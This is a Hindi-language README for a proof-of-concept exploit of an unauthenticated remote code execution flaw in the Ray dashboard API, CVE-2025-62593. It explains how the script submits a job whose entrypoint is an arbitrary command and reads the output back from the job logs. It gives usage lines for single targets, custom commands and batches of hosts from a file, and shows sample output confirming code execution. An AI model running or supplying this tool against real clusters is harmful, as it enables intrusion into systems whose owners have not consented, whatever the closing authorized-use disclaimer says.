
CVE-2025-62593 के लिए PoC: Ray में बिना प्रमाणीकरण के RCE (CISA KEV)। केवल Stdlib Python।
CVE-2025-62593 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो Ray वितरित AI कंप्यूट इंजन में बिना प्रमाणीकरण वाली रिमोट कोड एक्ज़ीक्यूशन भेद्यता है, जिसका दुरुपयोग ब्राउज़र-आधारित DNS-रीबाइंडिंग हमलों के माध्यम से किया जाता है। इसे CISA Known Exploited Vulnerabilities (KEV) कैटलॉग में जोड़ा गया है और इसका सक्रिय रूप से शोषण किया जा रहा है।
मूल कारण Ray टीम का एक लंबे समय से चला आ रहा डिज़ाइन निर्णय है, जिसमें /api/jobs और /api/job_agent/jobs जैसे महत्वपूर्ण HTTP एंडपॉइंट्स पर कोई प्रमाणीकरण नहीं चलाया जाता। इस वजह से, एक बिना प्रमाणीकरण वाला रिमोट हमलावर एक Ray Job सबमिट कर सकता है जिसका एंट्रीपॉइंट एक मनमाना कमांड है, जो फिर क्लस्टर हेड नोड पर निष्पादित होता है — पूर्ण रिमोट कोड एक्ज़ीक्यूशन।
यह PoC सीधे Ray Dashboard HTTP API से संवाद करता है (अंतर्निहित बग को प्रदर्शित करने के लिए ब्राउज़र/DNS-रीबाइंडिंग की आवश्यकता नहीं है) और जॉब लॉग्स से कमांड आउटपुट प्राप्त करता है।
POST /api/jobs/ एक entrypoint के साथ जो आपका कमांड चलाता है और उसके
stdout/stderr को एक अस्थायी फ़ाइल में कैप्चर करता है, फिर फ़ाइल को वापस प्रिंट करता है।GET /api/jobs/ को पोल करता है जब तक जॉब टर्मिनल स्थिति तक नहीं पहुँच जाता।GET /api/jobs/<submission_id>/logs को पढ़ता है और कमांड आउटपुट प्रिंट करता है।# Single target
python3 ray_rce_poc.py --target http://HOST:8265
# Custom command
python3 ray_rce_poc.py --target http://HOST:8265 --command "id; uname -a"
# Multiple targets from a file (one per line, '#' = comment)
python3 ray_rce_poc.py --targets targets.txt --command id
# Write a JSON summary
python3 ray_rce_poc.py --target http://HOST:8265 --output out.json
# Help
python3 ray_rce_poc.py --help
केवल Python 3 stdlib की आवश्यकता है — कोई थर्ड-पार्टी निर्भरता नहीं।
$ python3 ray_rce_poc.py --target http://localhost:8265 --command "id; hostname"
== http://localhost:8265
Running entrypoint for job raysubmit_XXX: python -c "import os,os.path; ..."
uid=1000(ray) gid=100(users) groups=100(users),27(sudo)
05cdb1bea437
=> PASS (RCE confirmed, status: SUCCEEDED, exit code: 0)
केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए। केवल उन्हीं सिस्टमों के विरुद्ध उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है। लेखक दुरुपयोग के लिए ज़िम्मेदार नहीं है।